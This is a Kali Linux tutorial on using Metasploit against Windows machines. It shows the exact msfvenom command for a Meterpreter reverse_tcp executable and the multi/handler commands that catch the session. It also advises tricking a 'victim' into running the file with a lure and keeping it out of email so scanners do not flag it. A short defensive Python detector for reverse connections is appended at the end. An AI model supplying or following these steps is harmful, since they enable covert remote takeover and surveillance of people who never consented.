Deploying a Payload with Metasploit in Kali Linux

Last Updated : 13 Feb, 2023
The Metasploit Framework is an open-source tool developed and maintained by Rapid7. It is a very powerful tool used by almost all penetration testers to scan for vulnerabilities in their systems. Metasploit Framework has about 500+ payloads and over 1677 exploits organized for different platforms, including Android, PHP, Python, Java, etc.

Metasploit Framework includes various tools for different tasks, including port scanning, OS fingerprinting, vulnerability scanning, etc.

 

What is a Payload?

A payload is like a carrier that delivers malware to the victim. Payloads can be made easily and are very dangerous; the danger is that many systems cannot even detect whether a file contains a payload or not. A payload can be in any format, such as pdf or exe, and it can even be embedded in pictures such as .jpg, .png, etc. Payloads can also be attached to any file without the victim knowing. Payloads are very small, so they are very difficult to notice.

Now we will install and run Metasploit on our system. We are using Kali Linux, but the process is the same for all Debian users.

Deploying a Payload with Metasploit

Step 1: Installing Metasploit-framework

Almost all Debian-based operating systems come with Metasploit Framework pre-installed. If yours does not, follow these steps:

Open your terminal with Ctrl+Alt+T and type

sudo apt install metasploit-framework -y

 

It will take some time, depending on your internet connection.

Once it is installed, you can try launching it by typing

msfconsole

 

Note: Every time you launch msfconsole, it will show a random welcome message, which is very cool!

Now we will create a payload for Windows.

Step 2: Creating Payload with msfvenom

msfvenom is a tool in the Metasploit toolkit that is used to make payloads. Create the payload by running the following command in the terminal:

msfvenom -p windows/meterpreter/reverse_tcp lhost=[Your ip address] lport=4040 -f exe R>[location to save payload]/gfg.exe

 

Note: You can find your IP address by typing ‘ifconfig’ in your terminal.

Step 3: Sending payload to the victim.

Now it is your turn to show some social engineering skills. If you know your victim, send them this payload, saying it is a special program from gfg or anything else they are interested in.

Note: Do not send this payload via E-mail service directly as E-mail can scan this and alert the victim that it is a virus.

Now, after sending the payload we need to set up the environment for us to grab a session of the victim.

This is what your payload will look like:

 

So, as soon as the victim opens the link, it will open a connection to your IP address.

Step 4: Setting up our environment for the Victim

Now, in the terminal, type

msfconsole

This starts the Metasploit Framework environment. You will see a prompt like msf6> in your terminal. Now run the following commands:

msf6> use exploit/multi/handler
msf6> set payload windows/meterpreter/reverse_tcp
msf6> set LHOST <your ip>
msf6> set LPORT 4040
msf6> exploit -j

 

As soon as the victim opens your payload, you will get a Meterpreter session.

This is the Windows system we were exploiting. Look carefully: we have gained access to its command prompt and can do whatever we want with it.

 

You can see all the commands with the help command and see how we can access the victim’s computer. Let us show you a demo:

 

As you can see, this command takes a screenshot of the victim’s computer, showing what the victim is doing. The screenshot is saved at the location shown in the output.
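Seen from the defender's side, the reverse_tcp payload described above appears as an outbound connection initiated by an executable running from a user-writable folder. The following is an added example, not part of the original article, that flags such connections; the record format, the folder list, the port list and the sample records are all assumptions constructed for illustration.

```python
import csv
import io
import ntpath

# Constructed sample records (not real telemetry). Columns are an assumed
# export format: time, process image, destination IP/port, and whether the
# local host initiated the connection.
SAMPLE_LOG = r"""time,image,dest_ip,dest_port,initiated
2023-02-13T10:01:07,C:\Program Files\Mozilla Firefox\firefox.exe,198.51.100.7,443,true
2023-02-13T10:02:41,C:\Users\bob\Downloads\gfg.exe,192.168.1.50,4040,true
2023-02-13T10:03:15,C:\Windows\System32\svchost.exe,192.168.1.1,53,true
2023-02-13T10:04:02,C:\Users\bob\AppData\Local\Temp\setup.exe,203.0.113.9,443,true
2023-02-13T10:05:30,C:\Users\bob\Downloads\tool.exe,192.168.1.50,4040,false
"""

# Assumed heuristics: folders where delivered files usually land, and ports
# that ordinary client software commonly connects to.
USER_WRITABLE = ("\\downloads\\", "\\appdata\\local\\temp\\", "\\desktop\\")
COMMON_PORTS = {53, 80, 443}


def suspicious_connections(log_text):
    """Return outbound connections made by executables in user-writable folders."""
    findings = []
    for row in csv.DictReader(io.StringIO(log_text.strip())):
        if row["initiated"].lower() != "true":
            continue  # inbound connection: not the reverse-connection pattern
        image = row["image"].lower()
        if not any(folder in image for folder in USER_WRITABLE):
            continue  # installed software and system binaries are out of scope
        port = int(row["dest_port"])
        findings.append({
            "time": row["time"],
            "process": ntpath.basename(row["image"]),
            "dest": f'{row["dest_ip"]}:{port}',
            # An uncommon destination port raises the priority of the alert.
            "severity": "medium" if port in COMMON_PORTS else "high",
        })
    return findings


if __name__ == "__main__":
    for finding in suspicious_connections(SAMPLE_LOG):
        print(finding)
```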

